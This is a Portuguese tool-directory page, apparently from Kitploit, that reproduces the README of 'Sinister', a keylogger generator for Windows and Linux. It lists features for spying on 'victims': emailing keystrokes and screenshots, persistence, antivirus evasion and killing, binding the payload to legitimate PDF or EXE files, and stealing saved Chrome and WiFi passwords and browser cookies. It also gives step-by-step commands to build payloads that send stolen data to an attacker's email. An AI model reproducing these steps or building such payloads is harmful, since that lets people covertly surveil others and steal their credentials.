Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Sinister — Sinister é um Gerador de Keylogger para Windows/Linux que envia logs de teclas por e-mail com outras informações interessantes do alvo. | Kitploit
Ferramentas/GitHubGitHub/pushpenderindia/sinister
Quebra de SenhasGeração de PayloadsMecanismos de PersistênciaExfiltração de DadosColeta de InformaçõesPós-ExploraçãoRed TeamingFerramenta de Acesso Remoto
GitHubpushpenderindia/sinister

Sinister

Sinister é um Gerador de Keylogger para Windows/Linux que envia logs de teclas por e-mail com outras informações interessantes do alvo.

4659329há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Sinister Logo

Sinister

Hacker GIF

                    Este pequeno script Python pode fazer um trabalho realmente incrível.

Sinister é um Gerador de Keylogger para Windows/Linux, que envia logs de teclas e capturas de tela por e-mail, juntamente com outras informações interessantes da vítima, escrito em Python 3.

Aviso Legal

:computer: Este projeto foi criado apenas para bons propósitos e uso pessoal.

ESTE SOFTWARE É FORNECIDO "COMO ESTÁ", SEM GARANTIA DE QUALQUER TIPO. VOCÊ PODE USAR ESTE SOFTWARE POR SUA CONTA E RISCO. O USO É DE TOTAL RESPONSABILIDADE DO USUÁRIO FINAL. OS DESENVOLVEDORES NÃO ASSUMEM NENHUMA RESPONSABILIDADE E NÃO SÃO RESPONSÁVEIS POR QUALQUER USO INDEVIDO OU DANO CAUSADO POR ESTE PROGRAMA.

Funcionalidades

  • Funciona em Windows/Linux
  • Notificar nova vítima por e-mail
  • Indetectável
  • Persistência
  • Validação das credenciais de e-mail antes da geração do payload.
  • Pode receber logs de teclas em qualquer provedor de e-mail, como GMAIL, YAHOO, OUTLOOK, SMTP personalizado.
  • Servidor/Porta SMTP
Nome do ServidorServidor SMTPPorta SMTP
GMAILsmtp.gmail.com587
OUTLOOKsmtp-mail.outlook.com587
YAHOOsmtp.mail.yahoo.com587
  • Envia captura de tela da tela do PC da vítima por e-mail
  • Cria binário executável com zero dependências
  • Cria payload de tamanho reduzido ~5mb com funcionalidades avançadas
  • Ofusca o payload antes de gerá-lo, ignorando assim alguns antivírus
  • O payload gerado é codificado com base64, dificultando extremamente a engenharia reversa
  • Função para matar o Antivírus no PC da vítima e tentar desabilitar a segurança
  • Interface colorida incrível para gerar payload
  • No lado do atacante: ao criar o payload, o script detecta automaticamente dependências ausentes e as instala
  • Diferencia os dados de log com base no nome da janela ativa (Veja a imagem para melhor compreensão)
  • Capacidade de adicionar ícone personalizado ao arquivo malicioso
  • Agregador embutido que pode agregar o keylogger a qualquer arquivo [.pdf, .txt, .exe etc], executando o arquivo legítimo na frente e os códigos maliciosos em segundo plano como serviço.
  • Verifica se já existe instância em execução no sistema. Se encontrada, apenas o arquivo legítimo é executado [Proibidor de Múltiplas Instâncias para evitar recebimento de logs de e-mail duplicados].
  • O atacante pode criar/compilar para Windows/Linux usando sistema Linux, mas só pode criar/compilar executável Windows usando máquina Windows
  • Recupera senhas salvas do sistema da vítima e as envia para o atacante.
O agregador embutido pode roubar estas coisas:
Navegador Chrome (senhas salvas)
WiFi (senhas salvas)
Cookies do Chrome (dados de login, cookies, histórico)
Cookies do Firefox (cookies.sqlite)

Nota: O agregador personalizado é codificado, não depende do LaZagne

  • Coleta e envia informações úteis do dispositivo da vítima
Estas coisas são coletadas e enviadas:
Sistema Operacional
Nome do Computador
Nome de Usuário
IPv4 Público
  • Se o seu payload não conseguir executar, use --debug para executar o exe em primeiro plano com CMD

Importante

Em 30 de maio de 2022, o Google removeu o recurso de aplicativos menos seguros, portanto, em vez da senha do Gmail:

  • Ative a 2FA no seu Gmail atacante
  • Crie uma senha específica de aplicativo
  • Use essa senha específica de aplicativo ao criar o payload.
  • Como criar senha específica de aplicativo: Clique aqui

Testado em

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Pré-requisitos

  • Python 3.X
  • Alguns módulos externos

Como usar no Linux

# Navegue até o diretório /opt (opcional)
$ cd /opt/

# Clone este repositório
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Navegue até a pasta Sinister
$ cd Sinister

# Instalando dependências
$ bash installer_linux.sh

*** Nota: Quando a caixa de diálogo do instalador do Python aparecer durante a execução do installer_linux.sh ***
    * Clique em instalação personalizada
    * Selecione Caminho para: C:/Python37-32
    ### Para que o Python seja instalado neste caminho (dentro do Wine): ~/.wine/drive_c/Python37-32

# Se você estiver tendo erros ao executar o installer_linux.sh, tente instalar usando o installer_linux.py
$ python3 installer_linux.py

$ chmod +x Sinister.py
$ python3 Sinister.py --help

# Criando Payload/RAT
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do GMAIL, configuração de porta (Servidor SMTP padrão = smtp.gmail.com, Porta SMTP padrão = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do OUTLOOK, configuração de porta
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path

# Criando Payload usando servidor SMTP do YAHOO, configuração de porta
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path

Nota: Você também pode usar nossos ícones personalizados da pasta icon, basta usá-los assim --icon icon/pdf.ico

Como usar no Windows

# Instale as dependências
$ Instale o Python 3.x mais recente

# Clone este repositório
$ git clone https://github.com/PushpenderIndia/Sinister.git

# Entre no repositório
$ cd Sinister

# Instalando dependências
$ python -m pip install -r requirements.txt

# Abra Sinister.py no editor de texto e configure a linha 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"

# Obtendo menu de ajuda
$ python Sinister.py --help

# Criando Payload/RAT
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
Baixar ferramenta